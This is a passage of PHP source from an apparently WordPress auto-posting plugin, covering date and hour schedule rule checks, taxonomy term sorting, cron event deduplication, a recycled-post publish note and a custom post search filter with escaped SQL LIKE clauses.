			
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, checking condition %s. Check time is %s'  ), __FUNCTION__, $type, $date, date( "D M j G:i:s T Y", $checkTime ) ) );
			
			$yearCheck = $monthCheck = $dayCheck = $MCheck = $DCheck = $hoursCheck = $startHour = $endHour = null;

			// first look for a relative format, like "first friday of the month"
			// also catches "Mon" or "Friday"
			if ( false !== ( $rel = strtotime( $date ) ) ) {	
				// https://www.php.net/manual/en/datetime.formats.relative.php
				$reldate = $date;
				$date = date( "Y-m-d", $rel );
				if ( $this->getOption( 'DebugMode' ) === 'on' )
					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, converted relative format \'%s\' to \'%s\''  ), __FUNCTION__, $type, $reldate, $date ) );
			}

			// next look for format (something):hhhh-hhhh
			$parts = explode( ':', $date );
			if ( count( $parts ) >= 2 ) {
				$date       = $parts[ 0 ];
				$hoursCheck = $parts[ 1 ];
			}

			// formats: YYYY-MM-DD and variants
			$parts = explode( '-', $date );
			
			if ( $this->getOption( 'DebugMode' ) === 'on' )
				$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, date parts (YYYY-MM-DD) are %s'  ), __FUNCTION__, $type, print_r( $parts, true ) ) );

			if ( count( $parts ) >= 3 ) {
				// YYYY-MM-DD
				$yearCheck  = $parts[ 0 ];
				$monthCheck = $parts[ 1 ];
				$dayCheck   = $parts[ 2 ];
			} else if ( count( $parts ) === 2 ) {
				if ( strlen( $parts[ 0 ] ) >= 4 && strlen( $parts[ 1 ] >= 4 ) )
					$hoursCheck = $date; // just hhhh-hhhh
				else if ( strlen( $parts[ 0 ] ) >= 4 ) {
					// YYYY-MM
					$yearCheck  = $parts[ 0 ];
					$monthCheck = $parts[ 1 ];
				} else {
					// MM-DD
					$monthCheck = $parts[ 0 ];
					$dayCheck   = $parts[ 1 ];
				}
			} else if ( count( $parts ) <= 1 ) {
				$date = ucwords( $date );
				if ( is_numeric( $date ) && strlen( $date ) >= 4 )
					$yearCheck = $date;
				else if ( is_numeric( $date ) )
					$dayCheck = $date;
				else if ( true === $this->checkDateValidity( $date, "M" ) )
					$MCheck = $date;
				else if ( true === $this->checkDateValidity( $date, "D" ) )
					$DCheck = $date;
				else {
					$this->addLogMessage( sprintf( esc_html__( 'WAP Error - function %s for %s, \'%s\' is not recognized. Ignored.'  ), __FUNCTION__, $type, $date ) );
					continue;
				}
			}
			
			if ( !empty( $hoursCheck ) ) {
				$parts = explode( '-', $hoursCheck );
				if ( $this->getOption( 'DebugMode' ) === 'on' )
					$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s for %s, hours parts are %s'  ), __FUNCTION__, $type, print_r( $parts, true ) ) );
				if ( count( $parts ) >= 2 ) {
					$startHour = $parts[ 0 ];
					$endHour   = $parts[ 1 ];
				} else {
					$this->addLogMessage( sprintf( esc_html__( 'WAP Error - function %s for %s, %s is not recognized. Ignored.'  ), __FUNCTION__, $type, $date ) );
					continue;
				}
				$time24 = date( "Hi", $checkTime );
			}
			
			if ( $yearCheck && !is_numeric( $yearCheck ) || $monthCheck && !is_numeric( $monthCheck ) || $dayCheck && !is_numeric( $dayCheck ) || $startHour && !is_numeric( $startHour ) || $endHour && !is_numeric( $endHour ) ) {
				$this->addLogMessage( sprintf( esc_html__( 'WAP Error - function %s for %s, %s is not recognized. Ignored.'  ), __FUNCTION__, $type, $date ) );
				continue;
			}
			
			if ( 'inclusions' === $type ) {
				if ( $hoursCheck && ( $time24 < $startHour || $time24 > $endHour ) )
					$passed = false;
				else if ( $yearCheck && $yearCheck != date( "Y", $checkTime ) )
					$passed = false;
				else if ( $monthCheck && $monthCheck != date( "m", $checkTime ) )
					$passed = false;
				else if ( $dayCheck && $dayCheck != date( "d", $checkTime ) )
					$passed = false;
				else if ( $MCheck && false === $this->check3Dates( $MCheck, "M" ) )
					$passed = false;
				else if ( $DCheck && false === $this->check3Dates( $DCheck, "D" ) )
					$passed = false;
				else // only one inclusion rule needs to pass for entire check to pass
					return true;
			} else {
				$passed = false;
				if ( $hoursCheck && ( $time24 < $startHour || $time24 > $endHour ) )
					$passed = true;
				if ( $yearCheck && $yearCheck != date( "Y", $checkTime ) )
					$passed = true;
				if ( $monthCheck && $monthCheck != date( "m", $checkTime ) )
					$passed = true;
				if ( $dayCheck && $dayCheck != date( "d", $checkTime ) )
					$passed = true;
				if ( $MCheck && false === $this->check3Dates( $MCheck, "M" ) )
					$passed = true;
				if ( $DCheck && false === $this->check3Dates( $DCheck, "D" ) )
					$passed = true;
				if ( false === $passed ) // only one exclusion rule needs to fail
					return false;
			}
			
		} // end for loop
		return $passed;
	}
	
	/**
	 * Check if 3 letter months/days setting are valid
	 * @param string $check in format Jan/Feb/Mar or Mon/Tue/Wed
	 * @param string $which either "M" or "D"
	 * @return boolean true or false
	 */
	private function checkDateValidity( $check, $which ) {
		$monthsofYear = array(
			'Jan',
			'Feb',
			'Mar',
			'Apr',
			'May',
			'Jun',
			'Jul',
			'Aug',
			'Sep',
			'Oct',
			'Nov',
			'Dec',
			'January',
			'February',
			'March',
			'April',
			'May',
			'June',
			'July',
			'August',
			'September',
			'October',
			'November',
			'December' 
		);
		$daysofWeek   = array(
			'Mon',
			'Tue',
			'Wed',
			'Thu',
			'Fri',
			'Sat',
			'Sun',
			'Monday',
			'Tuesday',
			'Wednesday',
			'Thursday',
			'Friday',
			'Saturday',
			'Sunday' 
		);
		
		$whichCheck = $which === 'M' ? $monthsofYear : $daysofWeek;
		$dates = explode( '/', $check );
		foreach ( $dates as $date ) {
			if ( !in_array( $date, $whichCheck ) ) {
				return false;
			}
		}
		return true;
	}
	
	/**
	 * Check if current day or month matches format for today
	 * If long form, change format to match. 
	 * @param string $check in format Jan/Feb/Mar or Mon/Tue/Wed
	 * @param string $format the format to check either "M" or "D"
	 * @return boolean true or false
	 */
	private function check3Dates( $check, $format, $checkTime = null ) {

		if ( ! $checkTime )
			$checkTime = current_time( 'timestamp' );

		$dates = explode( '/', $check );
		
		foreach ( $dates as $date ) {
			if ( strlen( $date ) <= 3 ) // Mon, Tue, Jan, Feb, etc.
				$match = date( $format, $checkTime );
			elseif ( $format === 'D' ) // Sunday through Saturday
				$match = date( 'l', $checkTime );
			elseif ( $format === 'M' ) // January through December
				$match = date( 'F', $checkTime );

			if ( $date === $match )
				return true;
		}
		return false;
	}
	
	/**
	 * Recursively sort an array of taxonomy terms hierarchically. Child categories will be
	 * placed under a 'children' member of their parent term.
	 * @param Array   $cats     taxonomy term objects to sort
	 * @param Array   $into     result array to put them in
	 * @param integer $parentId the current parent ID to put them in
	 */
	private function sortTermsHierarchicaly( &$cats, &$into, $parentId = 0 ) {
		foreach ( $cats as $i => $cat ) {
			if ( $cat->parent === $parentId ) {
				$into[ $cat->term_id ] = $cat;
				unset( $cats[ $i ] );
			}
		}
		
		foreach ( $into as $topCat ) {
			$topCat->children = array();
			$this->sortTermsHierarchicaly( $cats, $topCat->children, $topCat->term_id );
		}
	}
	
	/**
	 * Convert taxonomy term objects into id:name array
	 * Indent taxnomies when they are children according to level down
	 * @param array $terms the list of terms for this taxonomy
	 * @param array $into the re-ordered list of terms for this taxonomy, now in id->name format
	 * @param integer $level the depth of the current tree, used for indenting the name
	 * Example: parent term
	 *          - child term
	 *          -- grandchild term
	 */
	private function convertTerms( $terms, &$into, $level = 0 ) {
		foreach ( $terms as $term ) {
			$prefix = '';
			for ( $x = 0; $x < $level; $x++ )
				$prefix .= '&#8212;' . ' ';
			$into[ $term->term_id ] = $prefix . $term->name;
			if ( !empty( $term->children ) )
				$this->convertTerms( $term->children, $into, $level + 1 );
		}
	}
	
	/**
	 * Sometimes WordPress gets confused and schedules additional events. 
	 * Make sure there is only one before executing event trigger
	 * @param integer $rulesetID  identifies the scheduled event(s) by this ID
	 */
	private function verifySingleCronEvent( $rulesetID ) {
		$crons = get_option( 'cron' );
		$args  = array(
			(int) $rulesetID 
		);
		$key   = md5( serialize( $args ) );
		
		$events = 0;
		$hook   = $this->getPluginTextDomain();
		
		foreach ( $crons as $timestamp => $cron ) {
			if ( isset( $cron[ $hook ][ $key ] ) )
				$events++;
		}
		
		if ( $events > 1 ) { // "There can be only one!" - Highlander
			wp_clear_scheduled_hook( $hook, $args );
			$customRecurrence = $hook . '-' . $rulesetID;
			wp_schedule_event( time() + 10, $customRecurrence, $hook, $args );
			$this->addLogMessage( sprintf( esc_html__( 'Warning - function %s, %s hook had %d events scheduled. Resetting.'  ), __FUNCTION__, $customRecurrence, $events ) );
			return 0;
		}
		
		return 1;
	}
	
	/**
	 * Whether to add the post's original publish date when recycling an old post.
	 * Will only do this once because it checks for the 'wap-recycled' class used in note.
	 * @param array $args the param args for upcoming call to wp_update_post
	 * @param WP_POST $post the current post we are recycling
	 * @param string $originalPublish is the setting for this ruleset
	 * return modified $args
	 */
	public function recycleOriginalPublishNote( $args, $post, $originalPublish, $note ) {
		
		if ( empty( $note ) )
			$note = 'This post was originally published on %%DATE%%';

		$note = str_ireplace( "%%DATE%%", get_the_date( '', $post->ID ), $note );
		$note = str_ireplace( "%%AUTHOR%%", get_the_author_meta( 'display_name', $post->post_author ), $note );
		
		$note = apply_filters( $this->getPluginTextDomain() . '-recycleOriginalPublishNote', $note, $post );
		if ( $originalPublish === 'Prepend' )
			$args[ 'post_content' ] = $note . $post->post_content;
		else
			$args[ 'post_content' ] = $post->post_content . $note;
		
		return $args;
	}

	/* ====================================================================================== */

	/**
	 * Customize WordPress search function. Can limit to any combo of title,content,excerpt
	 * @param $search
	 * @param $wp_query
	 * return modified $search string
	*/
	public function wap_custom_search( $search, $wp_query )
	{
		global $wpdb;
		if ( empty( $search ) ) {
			return $search; // skip processing - no search term in query
		}

		$q = $wp_query->query_vars;
		if ( empty( $q[ 'wap_search' ] ) ) {
			return $search;
		}

		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, original search: %s'  ), __FUNCTION__, $search ) );

		$n = ! empty( $q[ 'exact' ] ) ? '' : '%';
	
		$search_array = array();
	
		if ( in_array( 'title', $q[ 'wap_search' ] ) ) {
			$search_title = $searchand = '';
			foreach ( (array)$q[ 'search_terms' ] as $term ) {
				if ( substr( $term, 0, 1 ) === '-' ) {
					$comp = 'NOT LIKE';
					$term = ltrim( $term, '-' );
				}
				else
					$comp = 'LIKE';
				$term = esc_sql( $wpdb->esc_like($term) );
				$search_title .= "{$searchand}($wpdb->posts.post_title {$comp} '{$n}{$term}{$n}')";
				$searchand = ' AND ';
			}
			if ( ! empty( $search_title ) ) {
				$search_array[] = $search_title;
			}
		}
	
		if ( in_array( 'content', $q[ 'wap_search' ] ) ) {
			$search_content = $searchand = '';
			foreach ( (array)$q[ 'search_terms' ] as $term ) {
				if ( substr( $term, 0, 1 ) === '-' ) {
					$comp = 'NOT LIKE';
					$term = ltrim( $term, '-' );
				}
				else
					$comp = 'LIKE';
				$term = esc_sql( $wpdb->esc_like($term) );	
				$search_content .= "{$searchand}($wpdb->posts.post_content {$comp} '{$n}{$term}{$n}')";
				$searchand = ' AND ';
			}
			if ( ! empty( $search_content ) ) {
				$search_array[] = $search_content;
			}
		}
	
		if ( in_array( 'excerpt', $q[ 'wap_search' ] ) ) {
			$search_excerpt = $searchand = '';
			foreach ( (array)$q[ 'search_terms' ] as $term ) {
				if ( substr( $term, 0, 1 ) === '-' ) {
					$comp = 'NOT LIKE';
					$term = ltrim( $term, '-' );
				}
				else
					$comp = 'LIKE';
				$term = esc_sql( $wpdb->esc_like($term) );
				$search_excerpt .= "{$searchand}($wpdb->posts.post_excerpt {$comp} '{$n}{$term}{$n}')";
				$searchand = ' AND ';
			}
			if ( ! empty( $search_excerpt ) ) {
				$search_array[] = $search_excerpt;
			}
    		}
	
		if ( in_array( 'fields', $q[ 'wap_search' ] ) ) {
			$search_fields = $searchand = '';
			foreach ( (array)$q[ 'search_terms' ] as $term ) {
				if ( substr( $term, 0, 1 ) === '-' ) {
					$comp = 'NOT LIKE';
					$term = ltrim( $term, '-' );
				}
				else
					$comp = 'LIKE';
				$term = esc_sql( $wpdb->esc_like($term) );
				$search_fields .= "{$searchand}($wpdb->postmeta.meta_value {$comp} '{$n}{$term}{$n}')";
				$searchand = ' AND ';
			}
			if ( ! empty( $search_fields ) ) {
				$search_array[] = $search_fields;
			}
    		}
	
		$search = implode( ' OR ', $search_array );
		
		if ( ! empty( $search ) ) {
			$search = " AND ({$search}) ";
			if ( ! is_user_logged_in() )
				$search .= " AND ($wpdb->posts.post_password = '') ";
		}
		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s, modified search: %s'  ), __FUNCTION__, $search ) );

		return $search;
	}

	/* ====================================================================================== */

} // end class WpAutoPoster_Plugin extends WpAutoPoster_LifeCycle 
